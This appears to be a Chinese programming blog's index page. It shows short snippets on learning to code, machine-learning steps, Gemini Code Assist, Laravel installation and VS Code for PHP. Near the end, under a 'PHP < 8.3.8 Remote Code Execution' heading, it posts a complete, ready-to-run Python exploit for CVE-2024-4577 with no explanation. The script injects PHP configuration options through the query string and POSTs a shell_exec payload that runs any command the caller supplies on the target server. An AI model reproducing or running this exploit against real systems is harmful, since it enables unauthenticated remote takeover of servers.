王剑编程网

分享专业编程知识与实战技巧

零基础学编程不知道如何下手,该怎么办

以下是我的学习编程的经历,希望对初学者一些经验和教训,少走一些弯路,那么意义就达到了。

在大一下学期,我受知乎文化的影响,开始自学C语言,用的是传说中久负盛名的The C programming language,学到20页左右,死活看不懂,把书扔了。

过了一个月,开始上学校的选修课,上C++,老师上课默认大家学过C,以极快的速度照着ppt念,听不懂,开始进入C++苦逼的自学中。学得很努力,很长一段时间都在抱着一本清华大学出版的蓝皮C++书看,一遍又一遍硬头皮读下去。

机器学习实操步骤:收集数据、数据准备、选择一个模型、训练、评估、参数调整、预测

本文详细介绍了机器学习的七个核心步骤,从数据收集到模型预测,为初学者提供了一条清晰的学习路径,帮助他们理解并掌握机器学习项目从开始到完成的全过程。

近两年来 AI 产业已然成为新的焦点和风口,各互联网巨头都在布局人工智能,不少互联网产品经理也开始考虑转型 AI 产品经理,入门AI产品经理,或许你应该了解一些相关技术,本文将为你介绍机器学习的7个步骤

DeepSeek-V3开源项目作者居然也用PHP

https://github.com/deepseek-ai/DeepSeek-V3


其实大家可以看看其它作者都用啥工具(语言就是一个工具)大家能看到很多RUST,C,C++,GO,TS,PHP....

必藏!从漏洞靶场到数据库工具,20 款软件全搜罗

复制链接到夸克APP打开即可!及时下载,避免失效!

一、软件库

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、实用,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。


YzmCMS V5.7 正式版

Google推出Gemini Code助手企业版 提供企业级人工智能编程协助

今天,Google宣布Gemini Code Assist Enterprise 将为企业软件开发人员提供企业级人工智能辅助。 利用 Gemini 的大型上下文窗口,开发人员可以根据对本地代码库的深入了解获得更多相关响应。 Google还允许企业根据内部最佳实践和内部库定制 Gemini Code Assist。

Gemini Code Assist 提供人工智能编码辅助功能,帮助软件开发人员在整个软件开发生命周期内构建、部署和运行应用程序。 Gemini Code Assist 可在 VS Code 和 JetBrains IDE 等流行的集成开发环境中使用。启用后,开发人员可以获得代码补全、从注释中生成完整的函数或代码块、创建单元测试等。 Gemini Code Assist 的最大优点是它能根据开发人员的提示提供上下文化的响应。

PHP 之 Laravel 框架安装及相关开源软件

Laravel 被称为简洁、优雅的PHP开发框架,但第一次接触此框架的人有不少都卡在了安装上,其实在 Linux 下只需要很简单的几步就可以搞定,这里我们以 CentOS 下 PHP + Nginx + Mysql 的环境为例。

首先需要了解 Laravel 安装依赖,比如 Laravel4.2 就有下面的要求: PHP >= 5.4 - MCrypt PHP 扩展

最主要的是 PHP 版本,正常安装的话相关扩展应该都会包含

挖宝啦!探秘宝藏软件库,全是惊喜好物

友情提醒: 及时下载,避免失效!



如何利用vscode高效开发PHP(用vscode写php)

用最近使用PhpStorm的激活码到期了,就琢磨着换一个编辑器。vscode评价挺好的而且轻量级免费开源,所以决定vscode开发PHP。

  1. vscode介绍
  2. vscode常用的PHP插件
  3. 安装插件
  4. vscode 配置自己习惯的快捷键

PHP < 8.3.8 Remote Code Execution

直接上代码:

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / 
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /  
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')   


def exploit(url, command):       
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>' 
    }    
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)       
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])
控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言